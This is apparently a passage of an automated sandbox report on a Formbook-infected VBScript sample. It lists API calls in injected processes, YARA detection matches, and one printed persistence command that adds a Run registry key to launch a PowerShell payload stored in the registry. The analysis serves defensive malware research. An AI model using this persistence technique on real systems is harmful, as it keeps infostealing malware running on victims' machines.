Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72C00 NtQueryInformationProcess, 15_2_23B72C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72C60 NtCreateKey, 15_2_23B72C60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_04FC8560 Sleep,LdrInitializeThunk,NtProtectVirtualMemory, 15_2_04FC8560
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C635C0 NtCreateMutant,LdrInitializeThunk, 20_2_04C635C0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C64650 NtSuspendThread,LdrInitializeThunk, 20_2_04C64650
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C64340 NtSetContextThread,LdrInitializeThunk, 20_2_04C64340
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62CA0 NtQueryInformationToken,LdrInitializeThunk, 20_2_04C62CA0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62C60 NtCreateKey,LdrInitializeThunk, 20_2_04C62C60
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62C70 NtFreeVirtualMemory,LdrInitializeThunk, 20_2_04C62C70
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62DD0 NtDelayExecution,LdrInitializeThunk, 20_2_04C62DD0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62DF0 NtQuerySystemInformation,LdrInitializeThunk, 20_2_04C62DF0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62D10 NtMapViewOfSection,LdrInitializeThunk, 20_2_04C62D10
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62D30 NtUnmapViewOfSection,LdrInitializeThunk, 20_2_04C62D30
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62EE0 NtQueueApcThread,LdrInitializeThunk, 20_2_04C62EE0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62E80 NtReadVirtualMemory,LdrInitializeThunk, 20_2_04C62E80
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62FB0 NtResumeThread,LdrInitializeThunk, 20_2_04C62FB0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62F30 NtCreateSection,LdrInitializeThunk, 20_2_04C62F30
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C639B0 NtGetContextThread,LdrInitializeThunk, 20_2_04C639B0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62BE0 NtQueryValueKey,LdrInitializeThunk, 20_2_04C62BE0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 20_2_04C62BF0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62B60 NtClose,LdrInitializeThunk, 20_2_04C62B60
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C63090 NtSetValueKey, 20_2_04C63090
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C63010 NtOpenDirectoryObject, 20_2_04C63010
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62CC0 NtQueryVirtualMemory, 20_2_04C62CC0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62CF0 NtOpenProcess, 20_2_04C62CF0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62C00 NtQueryInformationProcess, 20_2_04C62C00
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62DB0 NtEnumerateKey, 20_2_04C62DB0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C63D70 NtOpenThread, 20_2_04C63D70
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62D00 NtSetInformationFile, 20_2_04C62D00
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C63D10 NtOpenProcessToken, 20_2_04C63D10
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62EA0 NtAdjustPrivilegesToken, 20_2_04C62EA0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62E30 NtWriteVirtualMemory, 20_2_04C62E30
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62FE0 NtCreateFile, 20_2_04C62FE0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62F90 NtProtectVirtualMemory, 20_2_04C62F90
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62FA0 NtQuerySection, 20_2_04C62FA0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62F60 NtCreateProcessEx, 20_2_04C62F60
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62AD0 NtReadFile, 20_2_04C62AD0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62AF0 NtWriteFile, 20_2_04C62AF0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62AB0 NtWaitForSingleObject, 20_2_04C62AB0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62B80 NtQueryInformationFile, 20_2_04C62B80
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C62BA0 NtEnumerateValueKey, 20_2_04C62BA0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009E75C0 NtCreateFile, 20_2_009E75C0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009E7720 NtReadFile, 20_2_009E7720
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009E7890 NtClose, 20_2_009E7890
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009E79E0 NtAllocateVirtualMemory, 20_2_009E79E0
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9BABCAD6 7_2_00007FFD9BABCAD6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9BABD882 7_2_00007FFD9BABD882
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B8739A 15_2_23B8739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C003E6 15_2_23C003E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4E3F0 15_2_23B4E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF132D 15_2_23BF132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BFA352 15_2_23BFA352
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2D34C 15_2_23B2D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B452A0 15_2_23B452A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5D2F0 15_2_23B5D2F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE12ED 15_2_23BE12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5B2C0 15_2_23B5B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE0274 15_2_23BE0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4B1B0 15_2_23B4B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C001AA 15_2_23C001AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF81CC 15_2_23BF81CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BDA118 15_2_23BDA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C0B16B 15_2_23C0B16B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B30100 15_2_23B30100
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B7516C 15_2_23B7516C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC8158 15_2_23BC8158
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF70E9 15_2_23BF70E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BFF0E0 15_2_23BFF0E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BEF0CC 15_2_23BEF0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B470C0 15_2_23B470C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BFF7B0 15_2_23BFF7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3C7C0 15_2_23B3C7C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B40770 15_2_23B40770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B64750 15_2_23B64750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5C6E0 15_2_23B5C6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF16CC 15_2_23BF16CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BDD5B0 15_2_23BDD5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C00591 15_2_23C00591
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B40535 15_2_23B40535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF7571 15_2_23BF7571
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BEE4F6 15_2_23BEE4F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BFF43F 15_2_23BFF43F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B31460 15_2_23B31460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF2446 15_2_23BF2446
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5FB80 15_2_23B5FB80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB5BF0 15_2_23BB5BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B7DBF9 15_2_23B7DBF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF6BD7 15_2_23BF6BD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BFFB76 15_2_23BFFB76
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BFAB40 15_2_23BFAB40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BDDAAC 15_2_23BDDAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B85AA0 15_2_23B85AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3EA80 15_2_23B3EA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BEDAC6 15_2_23BEDAC6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB3A6C 15_2_23BB3A6C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BFFA49 15_2_23BFFA49
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF7A46 15_2_23BF7A46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B429A0 15_2_23B429A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C0A9A6 15_2_23C0A9A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B56962 15_2_23B56962
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B49950 15_2_23B49950
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5B950 15_2_23B5B950
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B268B8 15_2_23B268B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6E8F0 15_2_23B6E8F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B438E0 15_2_23B438E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BAD800 15_2_23BAD800
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B42840 15_2_23B42840
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4A840 15_2_23B4A840
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BFFFB1 15_2_23BFFFB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B41F92 15_2_23B41F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B32FC8 15_2_23B32FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B60F30 15_2_23B60F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B82F28 15_2_23B82F28
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BFFF09 15_2_23BFFF09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB4F40 15_2_23BB4F40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B49EB0 15_2_23B49EB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B52E90 15_2_23B52E90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BFCE93 15_2_23BFCE93
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BFEEDB 15_2_23BFEEDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BFEE26 15_2_23BFEE26
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B40E59 15_2_23B40E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B58DBF 15_2_23B58DBF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3ADE0 15_2_23B3ADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5FDC0 15_2_23B5FDC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4AD00 15_2_23B4AD00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF7D73 15_2_23BF7D73
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF1D5A 15_2_23BF1D5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B43D40 15_2_23B43D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE0CB5 15_2_23BE0CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B30CF2 15_2_23B30CF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BFFCF2 15_2_23BFFCF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB9C32 15_2_23BB9C32
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B40C00 15_2_23B40C00
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CDE4F6 20_2_04CDE4F6
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CE2446 20_2_04CE2446
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C21460 20_2_04C21460
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CEF43F 20_2_04CEF43F
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CF0591 20_2_04CF0591
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CCD5B0 20_2_04CCD5B0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CE7571 20_2_04CE7571
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C30535 20_2_04C30535
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CE16CC 20_2_04CE16CC
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C4C6E0 20_2_04C4C6E0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C2C7C0 20_2_04C2C7C0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CEF7B0 20_2_04CEF7B0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C54750 20_2_04C54750
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C30770 20_2_04C30770
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CDF0CC 20_2_04CDF0CC
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C370C0 20_2_04C370C0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CE70E9 20_2_04CE70E9
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CEF0E0 20_2_04CEF0E0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CE81CC 20_2_04CE81CC
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CF01AA 20_2_04CF01AA
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C3B1B0 20_2_04C3B1B0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CFB16B 20_2_04CFB16B
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C6516C 20_2_04C6516C
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C1F172 20_2_04C1F172
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C20100 20_2_04C20100
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CCA118 20_2_04CCA118
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C4B2C0 20_2_04C4B2C0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CD12ED 20_2_04CD12ED
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C4D2F0 20_2_04C4D2F0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C352A0 20_2_04C352A0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CD0274 20_2_04CD0274
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CF03E6 20_2_04CF03E6
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C3E3F0 20_2_04C3E3F0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C7739A 20_2_04C7739A
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C1D34C 20_2_04C1D34C
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CEA352 20_2_04CEA352
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CE132D 20_2_04CE132D
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C20CF2 20_2_04C20CF2
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CEFCF2 20_2_04CEFCF2
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CD0CB5 20_2_04CD0CB5
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C30C00 20_2_04C30C00
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CA9C32 20_2_04CA9C32
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C4FDC0 20_2_04C4FDC0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C2ADE0 20_2_04C2ADE0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C48DBF 20_2_04C48DBF
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C33D40 20_2_04C33D40
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CE1D5A 20_2_04CE1D5A
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CE7D73 20_2_04CE7D73
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C3AD00 20_2_04C3AD00
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CEEEDB 20_2_04CEEEDB
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C42E90 20_2_04C42E90
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CECE93 20_2_04CECE93
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C39EB0 20_2_04C39EB0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C30E59 20_2_04C30E59
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CEEE26 20_2_04CEEE26
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C22FC8 20_2_04C22FC8
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C31F92 20_2_04C31F92
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CEFFB1 20_2_04CEFFB1
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CA4F40 20_2_04CA4F40
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CEFF09 20_2_04CEFF09
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C72F28 20_2_04C72F28
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C50F30 20_2_04C50F30
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C338E0 20_2_04C338E0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C5E8F0 20_2_04C5E8F0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C168B8 20_2_04C168B8
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C32840 20_2_04C32840
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C3A840 20_2_04C3A840
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C9D800 20_2_04C9D800
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C329A0 20_2_04C329A0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CFA9A6 20_2_04CFA9A6
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C39950 20_2_04C39950
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C4B950 20_2_04C4B950
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C46962 20_2_04C46962
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CDDAC6 20_2_04CDDAC6
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C2EA80 20_2_04C2EA80
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CCDAAC 20_2_04CCDAAC
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C75AA0 20_2_04C75AA0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CEFA49 20_2_04CEFA49
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CE7A46 20_2_04CE7A46
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CA3A6C 20_2_04CA3A6C
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CE6BD7 20_2_04CE6BD7
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C6DBF9 20_2_04C6DBF9
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C4FB80 20_2_04C4FB80
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CEAB40 20_2_04CEAB40
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04CEFB76 20_2_04CEFB76
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009D1360 20_2_009D1360
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009C1121 20_2_009C1121
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009CC520 20_2_009CC520
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009CA7C0 20_2_009CA7C0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009CC740 20_2_009CC740
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009E9C70 20_2_009E9C70
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009D2EB0 20_2_009D2EB0
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009D2EAC 20_2_009D2EAC
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009D2E6B 20_2_009D2E6B
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 23B75130 appears 36 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 23BBF290 appears 103 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 23BAEA12 appears 86 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 23B2B970 appears 265 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 23B87E54 appears 89 times
Source: C:\Windows\SysWOW64\clip.exe Code function: String function: 04C1B970 appears 248 times
Source: C:\Windows\SysWOW64\clip.exe Code function: String function: 04C9EA12 appears 84 times
Source: C:\Windows\SysWOW64\clip.exe Code function: String function: 04C77E54 appears 85 times
Source: C:\Windows\SysWOW64\clip.exe Code function: String function: 04CAF290 appears 103 times
Source: C:\Windows\SysWOW64\clip.exe Code function: String function: 04C65130 appears 36 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: Zahlungsbeleg 202405029058.vbs Initial sample: Strings found which are bigger than 50
One or more processes crash
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 480
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)"
Yara signature match
Source: amsi64_7316.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_7560.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
